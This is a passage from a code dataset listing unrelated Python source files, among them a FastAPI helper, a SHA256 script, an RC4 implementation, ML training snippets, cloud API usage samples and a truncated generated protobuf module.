content
stringlengths 5
1.05M
|
|---|
import socket
from typing import Any
import orjson
from fastapi.responses import ORJSONResponse as O
from pydantic import BaseModel
def default_encode(obj):
if isinstance(obj, BaseModel):
return obj.dict()
raise NotImplementedError
class ORJSONResponse(O):
def render(self, content: Any) -> bytes:
return orjson.dumps(content, default=default_encode)
def get_my_ip() -> str:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(('10.255.255.255', 1))
return s.getsockname()[0]
|
# Copyright 2018 the Deno authors. All rights reserved. MIT license.
"""
Computes the SHA256 hash and formats the result.
"""
import argparse
from hashlib import sha256
import os
import sys
def main():
parser = argparse.ArgumentParser(description=__doc__)
# Arguments specifying where input comes from.
# If multiple sources are specified, they are all concatenated together.
parser.add_argument(
"--input",
action="append",
dest="input",
type=str,
metavar="TEXT",
help="Hash literal text specified on the command line.")
parser.add_argument(
"--infile",
action="append",
dest="input",
type=read_file,
metavar="FILE",
help="Hash the contents of a file.")
# Arguments dealing with output.
parser.add_argument(
"--format",
type=str,
dest="format",
default="%s",
metavar="TEMPLATE",
help="Format output using Python template (default = '%%s').")
parser.add_argument(
"--outfile",
dest="outfile",
type=argparse.FileType("wb"),
default=sys.stdout,
metavar="FILE",
help="Write the formatted hash to a file (default = stdout).")
# Parse arguments. Print usage and exit if given no input.
args = parser.parse_args()
if (not args.input):
parser.print_usage()
return 1
# Compute the hash of all inputs concatenated together.
hasher = sha256()
for data in args.input:
hasher.update(data)
h = hasher.hexdigest()
# Format and write to specified out file (or the default, stdout).
args.outfile.write(args.format % h)
def read_file(filename):
with open(filename, "rb") as f:
return f.read()
if __name__ == '__main__':
sys.exit(main())
|
import bs4 as bs
import urllib.request
def get_article(site='https://www.brainpickings.org/2016/08/16/friendship/'):
# Scraping data using urllib and then parsing using beautifulsoup (by paragraph)
scraped_data = urllib.request.urlopen(site)
article = scraped_data.read()
parsed_article = bs.BeautifulSoup(article,'lxml')
paragraphs = parsed_article.find_all('p')
# Transfer into a string
article_text = ""
for p in paragraphs:
article_text += p.text
return article_text
|
"""Contains all exposed elements from the handlers.
"""
# Run an OS scrape of the handlers folder and return
# the read_x and write_x for each handler.
__all__ = []
|
import tensorflow as tf
import numpy as np
n_inputs = 3
n_neuros = 5
n_steps = 2
seq_length = tf.placeholder(tf.int32, [None])
X = tf.placeholder(tf.float32, [None, n_steps, n_inputs])
X_seqs = tf.unstack(tf.transpose(X, perm=[1, 0, 2]))
basic_cell = tf.contrib.rnn.BasicRNNCell(num_units=n_neuros)
output_seqs, states = tf.contrib.rnn.static_rnn(basic_cell, X_seqs, dtype=tf.float32, sequence_length=seq_length)
outputs = tf.transpose(tf.stack(output_seqs), perm=[1,0,2])
X_batch = np.random.rand(4, 2, 3)
seq_leng_batch = np.array([2, 2, 2, 2])
with tf.Session() as sess:
tf.global_variables_initializer().run()
outputs_val, states_val = sess.run([outputs, states], feed_dict={X:X_batch, seq_length:seq_leng_batch})
outputs_val1, states_val1 = sess.run([outputs, states], feed_dict={X:X_batch, seq_length:seq_leng_batch})
assert(np.all(outputs_val==outputs_val1))
seq_leng_batch = np.array([2, 2, 2, 2])
outputs_val2, states_val2 = sess.run([outputs, states], feed_dict={X:X_batch, seq_length:seq_leng_batch})
|
# -*- coding: utf-8 -*-
import click
from rich.console import Console
from .add import add
from .mklib import mklib
CONSOLE = Console()
@click.group()
def main():
pass
mklib = main.command(help="Create new empty library.")(mklib)
add = main.command(help="Add model to existing library.")(add)
|
from mongoengine.errors import (DoesNotExist, MultipleObjectsReturned,
InvalidQueryError, OperationError,
NotUniqueError)
from mongoengine.queryset.field_list import *
from mongoengine.queryset.manager import *
from mongoengine.queryset.queryset import *
from mongoengine.queryset.transform import *
from mongoengine.queryset.visitor import *
__all__ = (field_list.__all__ + manager.__all__ + queryset.__all__ +
transform.__all__ + visitor.__all__)
|
from com.xhaus.jyson import JysonCodec as json
from ij.plugin.frame import RoiManager
from ij.io import OpenDialog
from ij.gui import Roi, PolygonRoi
import sys
def get_roi(data):
if data['type'] == 'polygon':
return PolygonRoi(data['x'], data['y'], data['count'], Roi.POLYGON)
elif data['type'] == 'composite':
comp_rois = []
count = data['count']
last = count - 1
for i in range(count):
comp_rois.append(get_roi(data['rois'][i]))
roi = ShapeRoi(comp_rois[last])
for j in range(last):
roi.not(ShapeRoi(comp_rois[j]))
return roi
elif data['type'] == 'line':
return Line(data['x1'], data['y1'], data['x2'], data['y2'])
rm = RoiManager.getInstance()
if rm:
directory = "C:/Users/timre/Desktop/tutorial set/" # SET DATASET PATH HERE
imp = IJ.getImage()
name = directory + imp.title[:-4] + '.json'
file = open(name,'r')
read = file.read()
data = json.loads(read)
rm.reset()
for i in range(data['count']):
rm.addRoi(get_roi(data['rois'][i]))
rm.rename(i, data['classes'][i])
file.close()
else:
print("No roi manager open")
|
# RC4
# https://en.wikipedia.org/wiki/RC4
# Key-scheduling algorithm (KSA)
def ksa(key):
s = []
for i in range(0, 256):
s.append(i)
j = 0
for i in range(0, 256):
j = (j + s[i] + ord(key[i % len(key)])) % 256
s[i], s[j] = s[j], s[i]
return s
# Pseudo-random generation algorithm (PRGA)
def prga(s, text):
output = ''
i = 0
j = 0
for x in range(0, len(text)):
i = (i + 1) % 256
j = (j + s[i]) % 256
s[i], s[j] = s[j], s[i]
k = s[(s[i] + s[j]) % 256]
output += chr(k ^ ord(text[x]))
return output
def rc4crypt(key, data):
return prga(ksa(key), data)
|
# -*- coding: utf-8 -*-
# The above encoding declaration is required and the file must be saved as UTF-8
import random
class LotoTron:
pass
def __init__(self, min_num=1, max_num=90):
self._min_num = min_num
self._max_num = max_num
self._src_list = list(range(self._min_num, self._max_num + 1))
random.shuffle(self._src_list)
def get_next_keg(self):
keg = self._src_list.pop()
return keg
|
import pytest
from texthooks.fix_ligatures import parse_args as fix_ligatures_parse_args
from texthooks.fix_smartquotes import (
DEFAULT_DOUBLE_QUOTE_CODEPOINTS,
DEFAULT_SINGLE_QUOTE_CODEPOINTS,
)
from texthooks.fix_smartquotes import parse_args as fix_smartquotes_parse_args
def test_fix_ligatures_arg_parsing():
args1 = fix_ligatures_parse_args(argv=["foo", "bar"])
assert list(args1.files) == ["foo", "bar"]
assert args1.show_changes is False
args2 = fix_ligatures_parse_args(argv=["foo", "--show-changes"])
assert list(args2.files) == ["foo"]
assert args2.show_changes is True
def test_fix_smartquotes_arg_parsing():
args1 = fix_smartquotes_parse_args(argv=["foo", "bar"])
assert list(args1.files) == ["foo", "bar"]
assert args1.show_changes is False
assert args1.double_quote_codepoints == DEFAULT_DOUBLE_QUOTE_CODEPOINTS
assert args1.single_quote_codepoints == DEFAULT_SINGLE_QUOTE_CODEPOINTS
args2 = fix_smartquotes_parse_args(argv=["foo", "--show-changes"])
assert list(args2.files) == ["foo"]
assert args2.show_changes is True
assert args2.double_quote_codepoints == DEFAULT_DOUBLE_QUOTE_CODEPOINTS
assert args2.single_quote_codepoints == DEFAULT_SINGLE_QUOTE_CODEPOINTS
args3 = fix_smartquotes_parse_args(
argv=["foo", "--double-quote-codepoints", "FF02,201C"]
)
assert list(args3.files) == ["foo"]
assert args3.show_changes is False
assert list(args3.double_quote_codepoints) == ["FF02", "201C"]
assert args3.single_quote_codepoints == DEFAULT_SINGLE_QUOTE_CODEPOINTS
args4 = fix_smartquotes_parse_args(
argv=["foo", "--single-quote-codepoints", "FF07,201B"]
)
assert list(args4.files) == ["foo"]
assert args4.show_changes is False
assert args2.double_quote_codepoints == DEFAULT_DOUBLE_QUOTE_CODEPOINTS
assert list(args4.single_quote_codepoints) == ["FF07", "201B"]
@pytest.mark.parametrize(
"parse_func", [fix_ligatures_parse_args, fix_smartquotes_parse_args]
)
def test_invalid_color_opt(parse_func):
with pytest.raises(SystemExit) as excinfo:
parse_func(argv=["foo", "--color", "bar"])
err = excinfo.value
assert err.code == 2
|
#!/usr/bin/env python
""" Calculate the number of increases in a list of subsequent measurements which are smoothed
in a sliding window. Measurements are read from file
"""
import fileinput
import sys
if __name__ == "__main__":
if len(sys.argv) != 2:
print("Usage: day1_sonar_sweep_part2.py <measurements file>")
sys.exit(-1)
input_file = sys.argv[1]
measurements = [int(line) for line in fileinput.input(files=input_file) if line.strip() != '']
sliding_window = [sum(window) for window in zip(measurements, measurements[1:], measurements[2:])]
increases = sum(((m2-m1) > 0 for (m1, m2) in zip(sliding_window, sliding_window[1:])))
print(increases)
|
import sys
from inference_model import InferenceModel
from shared_latent_space import SharedLatentSpace
from decoder_train import DecoderTrain
from training import Training
from testing import Testing
from reconstructor import Reconstructor
from visualizer import Visualizer
import warnings
warnings.filterwarnings("ignore")
arguments = sys.argv
inference_model = InferenceModel()
if len(arguments)>1:
iteration = arguments[1]
epochs = arguments[2]
inference_model.Iteration= int(iteration)
inference_model.Epoch = int(epochs)
visualizer = Visualizer(inference_model)
shared_latent_space = SharedLatentSpace()
shared_latent_space.calculateZ(inference_model)
decoder = DecoderTrain(inference_model,shared_latent_space)
training = Training(inference_model,decoder)
testing = Testing(inference_model,decoder)
reconstructor = Reconstructor()
reconstructor.constructXtest(inference_model,training,testing)
reconstructor.constructXtrain(inference_model,training,testing)
visualizer.data_display(inference_model.XY_TrainLength,reconstructor.X_reconstructed_train,'X_reconstructed_train.png',False,False)
visualizer.data_display(inference_model.XY_TrainLength,inference_model.X_train,'X_train.png',False,False)
visualizer.data_display(inference_model.XY_TestLength,reconstructor.X_reconstructed_test,'X_reconstructed_test.png',False,True)
visualizer.data_display(inference_model.XY_TestLength,inference_model.X_test,'X_test.png',False,True)
visualizer.plotter(inference_model,reconstructor)
|
import numpy as np
from scipy.stats import multivariate_normal
from to.probabilistic_model import ProbabilisticModel
class MixtureModel(object):
def __init__(self, allModels, alpha=False):
self.model_list = allModels.copy()
self.nModels = len(allModels)
if alpha is False:
self.alpha = (1/self.nModels)*np.ones(self.nModels)
else:
self.alpha = alpha
self.probTable = None
self.nSol = None
self.__target_model_added = False
def add_target_solutions(self, solutions, modelType):
if not self.__target_model_added:
self.nModels = self.nModels + 1
self.model_list.append(ProbabilisticModel(modelType=modelType))
self.model_list[-1].buildModel(solutions)
self.target_model_added = True
else:
raise Exception('Target model is already added.')
def add_target_model(self, target_model):
if not self.__target_model_added:
self.nModels = self.nModels + 1
self.model_list.append(target_model)
self.target_model_added = True
else:
raise Exception('Target model is already added.')
def createTable(self, solutions, CV, modelType, probs_RL=None):
if CV:
self.add_target_solutions(solutions, modelType)
# self.nModels = self.nModels + 1
# self.model_list.append(ProbabilisticModel(modelType=modelType))
# self.model_list[-1].buildModel(solutions)
self.alpha = (1/self.nModels) * np.ones(self.nModels)
nSol = solutions.shape[0]
self.nSol = nSol
self.probTable = np.ones([nSol, self.nModels])
if probs_RL is None:
for j in range(self.nModels-1):
self.probTable[:, j] = self.model_list[j].pdfEval(solutions)
else:
for j in range(0, self.nModels-2):
self.probTable[:, j] = self.model_list[j].pdfEval(solutions)
self.probTable[:, -2] = probs_RL
for i in range(nSol): # Leave-one-out cross validation
x = np.concatenate((solutions[:i, :], solutions[i+1:, :]))
tModel = ProbabilisticModel(modelType=modelType)
tModel.buildModel(x)
self.probTable[i, -1] = tModel.pdfEval(solutions[[i], :])
else:
nSol = solutions.shape[0]
self.probTable = np.ones([nSol, self.nModels])
for j in range(self.nModels):
self.probTable[:, j] = self.model_list[j].pdfEval(solutions)
self.nSol = nSol
def EMstacking(self):
iterations = 100
for _ in range(iterations):
talpha = self.alpha
probVector = np.matmul(self.probTable, talpha.T)
for i in range(self.nModels):
talpha[i] = np.sum((1/self.nSol)*talpha[i]*self.probTable[:, i]/probVector)
self.alpha = talpha
def mutate(self):
modif_alpha = np.maximum(self.alpha + np.random.normal(0, 0.01, self.nModels), 0)
total_alpha = np.sum(modif_alpha)
if total_alpha == 0:
self.alpha = np.zeros(self.nModels)
self.alpha[-1] = 1
else:
self.alpha = modif_alpha/total_alpha
def sample(self, nSol, samplesRL=None):
# print('sample: ', self.alpha)
indSamples = np.ceil(nSol*self.alpha).astype(int)
solutions = np.array([])
for i in range(self.nModels):
if indSamples[i] == 0:
pass
elif i == self.nModels - 2 and samplesRL is not None:
solutions = np.vstack([solutions, samplesRL]) if solutions.size else samplesRL
else:
sols = self.model_list[i].sample(indSamples[i])
solutions = np.vstack([solutions, sols]) if solutions.size else sols
solutions = solutions[np.random.permutation(solutions.shape[0]), :]
solutions = solutions[:nSol, :]
return solutions
def sample_dic(self, nSol):
model_sample_pairs = np.ndarray(self.nModels, dtype=object)
indSamples = np.ceil(nSol*self.alpha).astype(int)
print('indSamples : {}'.format(indSamples))
for i in range(self.nModels):
if indSamples[i] == 0:
pass
else:
model_sample_pairs[i] = self.model_list[i].sample(indSamples[i])
# removing random solutions
print('sample_length: ', np.sum([len(s) for s in model_sample_pairs if s is not None]))
# solutions = solutions[np.random.permutation(solutions.shape[0]), :]
# solutions = solutions[:nSol, :]
return model_sample_pairs
def n_samples(self, ind, nSol):
return np.ceil(nSol * self.alpha[ind]).astype(int)
|
from collections import namedtuple
DetectedObjectTuple = namedtuple('DetectedObject', 'id label x y w h score frame timestamp')
class DetectedObject(DetectedObjectTuple):
@property
def cx(self):
return self.x + self.w / 2
@property
def cy(self):
return self.y + self.h / 2
@staticmethod
def from_dict(d):
d['id'] = int(d['id'])
d['frame'] = int(d['frame'])
d['x'] = float(d['x'])
d['y'] = float(d['y'])
d['w'] = float(d['w'])
d['h'] = float(d['h'])
d['score'] = float(d['score'])
d['timestamp'] = float(d['timestamp'])
# todo: remove
if 'cx' in d:
del d['cx']
if 'cy' in d:
del d['cy']
return DetectedObject(**d)
|
from abc import ABCMeta, abstractmethod
import logging
import time
import pause
logging.basicConfig()
class Timer(object):
""" Timer abstract base class represents interface for a periodic timer. """
__metaclass__=ABCMeta
@abstractmethod
def wait(self):
pass
@abstractmethod
def getTime(self):
pass
@staticmethod
def factory(type, interval):
if type == "Sleep": return Sleep(interval)
if type == "Dummy": return Dummy(interval)
assert 0, "Bad timer: " + type
class Sleep():
""" Implementation of class Timer using a simple sleep command.
"""
def __init__(self, interval):
self.interval = interval
self.last = int(time.time())
self.start = self.last
def wait(self):
pause.until(self.last + self.interval)
self.last = self.last + self.interval
return True
def getTime(self):
return int(time.time()) - self.start
class Dummy():
""" Dummy implementation of class Timer for testing.
"""
def __init__(self, interval):
self.interval = interval
self.time = 0
def wait(self):
self.time = self.time + self.interval
return True
def getTime(self):
return self.time
if __name__ == "__main__":
print("Test Timer")
timer = Timer.factory("Sleep", 1)
for interval in range(0,9):
timer.wait()
print(timer.getTime(), " seconds")
|
# Create a block storage
from oneandone.client import OneAndOneService, BlockStorage
client = OneAndOneService('<API-TOKEN>')
block_storage = BlockStorage(name='My new block storage',
description='My block storage description',
size=20,
datacenter_id='908DC2072407C94C8054610AD5A53B8C')
response = client.create_block_storage(block_storage)
# List all block storages
from oneandone.client import OneAndOneService, BlockStorage
client = OneAndOneService('<API-TOKEN>')
response = client.list_block_storages()
# Retrieve a single block storage
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.get_block_storage(block_storage_id='')
# Modify a block storage
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.modify_block_storage(block_storage_id='',
name='New name',
description='New Description')
# Attach block storage to a server
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.attach_block_storage(block_storage_id='', server_id='')
# Detach a block storage from a server
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.detach_block_storage(block_storage_id='')
# Delete a block storage
from oneandone.client import OneAndOneService
client = OneAndOneService('<API-TOKEN>')
response = client.delete_block_storage(block_storage_id='')
|
import chainer
from chainer.dataset import convert
from chainer.training import StandardUpdater
def fetch(iterators, converter, device=None):
return converter(iterators['main'].next(), device)
class TrainingStep(StandardUpdater):
def __init__(self, iterator, optimizer, metrics_func,
converter=convert.concat_examples, device=None,
fetch_func=fetch, metrics_option=None):
super(TrainingStep, self).__init__(iterator, optimizer, converter,
device)
if isinstance(optimizer, dict):
self._target = {name: opt.target for name, opt in optimizer.items()}
else:
self._target = optimizer.target
self._fetch_func = fetch_func
self._metrics_func = metrics_func
self._metrics_option = metrics_option
def update_core(self):
batch = self._fetch_func(self._iterators, self.converter, self.device)
if self._metrics_option is None:
step_result = self._metrics_func(self._target, batch)
else:
step_result = self._metrics_func(self._target, batch, self._metrics_option)
if isinstance(self._target, dict):
for name in self._target.keys():
if step_result.has_key(name):
self._post_process(name, step_result[name])
else:
self._post_process('main', step_result)
def _post_process(self, name, result):
if isinstance(result, dict):
loss = result['loss']
metrics = result
else:
loss = result
metrics = {'loss': loss}
optimizer = self.get_optimizer(name)
target = optimizer.target
target.cleargrads()
loss.backward()
optimizer.update()
chainer.report(metrics, target)
|
# -*- coding: utf-8 -*- #
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common command-agnostic utility functions for sql import commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
def SqlImportContext(sql_messages, uri, database=None, user=None):
"""Generates the ImportContext for the given args, for importing from SQL.
Args:
sql_messages: module, The messages module that should be used.
uri: The URI of the bucket to import from; the output of the 'uri' arg.
database: The database to import to; the output of the '--database' flag.
user: The Postgres user to import as; the output of the '--user' flag.
Returns:
ImportContext, for use in InstancesImportRequest.importContext.
"""
return sql_messages.ImportContext(
kind='sql#importContext',
uri=uri,
database=database,
fileType=sql_messages.ImportContext.FileTypeValueValuesEnum.SQL,
importUser=user)
def CsvImportContext(sql_messages,
uri,
database,
table,
columns=None,
user=None):
"""Generates the ImportContext for the given args, for importing from CSV.
Args:
sql_messages: module, The messages module that should be used.
uri: The URI of the bucket to import from; the output of the 'uri' arg.
database: The database to import into; the output of the '--database' flag.
table: The table to import into; the output of the '--table' flag.
columns: The CSV columns to import form; the output of the '--columns' flag.
user: The Postgres user to import as; the output of the '--user' flag.
Returns:
ImportContext, for use in InstancesImportRequest.importContext.
"""
return sql_messages.ImportContext(
kind='sql#importContext',
csvImportOptions=sql_messages.ImportContext.CsvImportOptionsValue(
columns=columns or [], table=table),
uri=uri,
database=database,
fileType=sql_messages.ImportContext.FileTypeValueValuesEnum.CSV,
importUser=user)
def BakImportContext(sql_messages, uri, database, cert_path, pvk_path,
pvk_password):
"""Generates the ImportContext for the given args, for importing from BAK.
Args:
sql_messages: module, The messages module that should be used.
uri: The URI of the bucket to import from; the output of the `uri` arg.
database: The database to import to; the output of the `--database` flag.
cert_path: The certificate used for encrypted .bak; the output of the
`--cert-path` flag.
pvk_path: The private key used for encrypted .bak; the output of the
`--pvk-path` flag.
pvk_password: The private key password used for encrypted .bak; the output
of the `--pvk-password` or `--prompt-for-pvk-password` flag.
Returns:
ImportContext, for use in InstancesImportRequest.importContext.
"""
bak_import_options = None
if cert_path and pvk_path and pvk_password:
bak_import_options = sql_messages.ImportContext.BakImportOptionsValue(
encryptionOptions=sql_messages.ImportContext.BakImportOptionsValue
.EncryptionOptionsValue(
certPath=cert_path, pvkPath=pvk_path, pvkPassword=pvk_password))
return sql_messages.ImportContext(
kind='sql#importContext',
uri=uri,
database=database,
fileType=sql_messages.ImportContext.FileTypeValueValuesEnum.BAK,
bakImportOptions=bak_import_options)
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: root.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='root.proto',
package='',
syntax='proto3',
serialized_options=None,
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n\nroot.proto\"\xf6\x10\n\x06nested\x1a\x1f\n\x01\x61\x12\x0b\n\x03key\x18\x01 \x01(\t\x12\r\n\x05value\x18\x02 \x01(\t\x1a\x1f\n\x01\x62\x12\x0e\n\x06method\x18\x01 \x01(\t\x12\n\n\x02iv\x18\x02 \x01(\x05\x1a\xff\x01\n\x13JudgeTimingBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12%\n\x08\x62usiBuff\x18\x04 \x01(\x0b\x32\x13.nested.JudgeTiming\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1a\xef\x01\n\x18GetAppInfoByLinkBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1a\x66\n\nUseUserApp\x12\r\n\x05\x61ppId\x18\x01 \x01(\t\x12\x0f\n\x07verType\x18\x02 \x01(\x03\x12\x0e\n\x06source\x18\x03 \x01(\x03\x12(\n\x0b\x63hannelInfo\x18\x04 \x01(\x0b\x32\x13.nested.channelInfo\x1a)\n\x0b\x63hannelInfo\x12\r\n\x05refer\x18\x01 \x01(\t\x12\x0b\n\x03via\x18\x02 \x01(\t\x1a\xe9\x01\n\x12UseUserAppBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1a\xe6\x01\n\x0fGetCodeBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1av\n\x0eGetAppInfoById\x12\r\n\x05\x61ppid\x18\x01 \x01(\t\x12\x17\n\x0fneedVersionInfo\x18\x02 \x01(\x03\x12\x15\n\rcheckDevRight\x18\x03 \x01(\x03\x12\x11\n\tfirstPath\x18\x04 \x01(\t\x12\x12\n\nenvVersion\x18\x05 \x01(\t\x1a\xed\x01\n\x16GetAppInfoByIdBusiBuff\x12\x0b\n\x03Seq\x18\x01 \x01(\x03\x12\x0b\n\x03qua\x18\x02 \x01(\t\x12\x12\n\ndeviceInfo\x18\x03 \x01(\t\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x0f\n\x07traceid\x18\x05 \x01(\t\x12\x0e\n\x06Module\x18\x06 \x01(\t\x12\x0f\n\x07\x43mdname\x18\x07 \x01(\t\x12 \n\x08loginSig\x18\x08 \x01(\x0b\x32\x0e.nested.C0011a\x12\x19\n\x06\x43rypto\x18\t \x01(\x0b\x32\t.nested.b\x12\x0f\n\x07\x45xtinfo\x18\n \x01(\x05\x12\x13\n\x0b\x63ontentType\x18\x0b \x01(\x05\x1a_\n\x01\x64\x12\x0b\n\x03Seq\x18\x01 \x01(\x05\x12\x0f\n\x07retCode\x18\x02 \x01(\x03\x12\x0e\n\x06\x65rrMsg\x18\x03 \x01(\x0c\x12\x10\n\x08\x62usiBuff\x18\x04 \x01(\x0c\x12\x1a\n\x07\x45xtinfo\x18\x05 \x03(\x0b\x32\t.nested.a\x1a\x91\x01\n\x06\x43\x30\x30\x31\x31\x61\x12\x0b\n\x03uin\x18\x01 \x01(\t\x12\x0b\n\x03sig\x18\x02 \x01(\t\x12\x10\n\x08platform\x18\x03 \x01(\t\x12\x0c\n\x04type\x18\x04 \x01(\x05\x12\r\n\x05\x61ppid\x18\x05 \x01(\t\x12\x0e\n\x06openid\x18\x06 \x01(\t\x12\x12\n\nsessionkey\x18\x07 \x01(\x0c\x12\x1a\n\x07\x45xtinfo\x18\x08 \x03(\x0b\x32\t.nested.a\x1a\x35\n\x03q2b\x12\x1a\n\x07mapInfo\x18\x01 \x03(\x0b\x32\t.nested.a\x12\x12\n\nattachInfo\x18\x02 \x01(\t\x1a\x85\x02\n\x0bJudgeTiming\x12\x1c\n\x07\x65xtInfo\x18\x01 \x01(\x0b\x32\x0b.nested.q2b\x12\r\n\x05\x61ppid\x18\x02 \x01(\t\x12\x10\n\x08\x66\x61\x63tType\x18\x03 \x01(\x05\x12\x10\n\x08\x64uration\x18\x04 \x01(\x05\x12\x12\n\nreportTime\x18\x05 \x01(\x03\x12\x14\n\x0c\x61\x66terCertify\x18\x06 \x01(\x05\x12\x0f\n\x07\x61ppType\x18\x07 \x01(\x05\x12\r\n\x05scene\x18\x08 \x01(\x05\x12\x11\n\ttotalTime\x18\t \x01(\x05\x12\x10\n\x08launchId\x18\n \x01(\t\x12\x0b\n\x03via\x18\x0b \x01(\t\x12\x14\n\x0c\x41\x64sTotalTime\x18\x0c \x01(\x05\x12\x13\n\x0bhostExtInfo\x18\r \x01(\t\x1a\x32\n\x10GetAppInfoByLink\x12\x0c\n\x04link\x18\x01 \x01(\t\x12\x10\n\x08linkType\x18\x02 \x01(\x05\x62\x06proto3'
)
_NESTED_A = _descriptor.Descriptor(
name='a',
full_name='nested.a',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='key', full_name='nested.a.key', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='value', full_name='nested.a.value', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=25,
serialized_end=56,
)
_NESTED_B = _descriptor.Descriptor(
name='b',
full_name='nested.b',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='method', full_name='nested.b.method', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='iv', full_name='nested.b.iv', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=58,
serialized_end=89,
)
_NESTED_JUDGETIMINGBUSIBUFF = _descriptor.Descriptor(
name='JudgeTimingBusiBuff',
full_name='nested.JudgeTimingBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.JudgeTimingBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
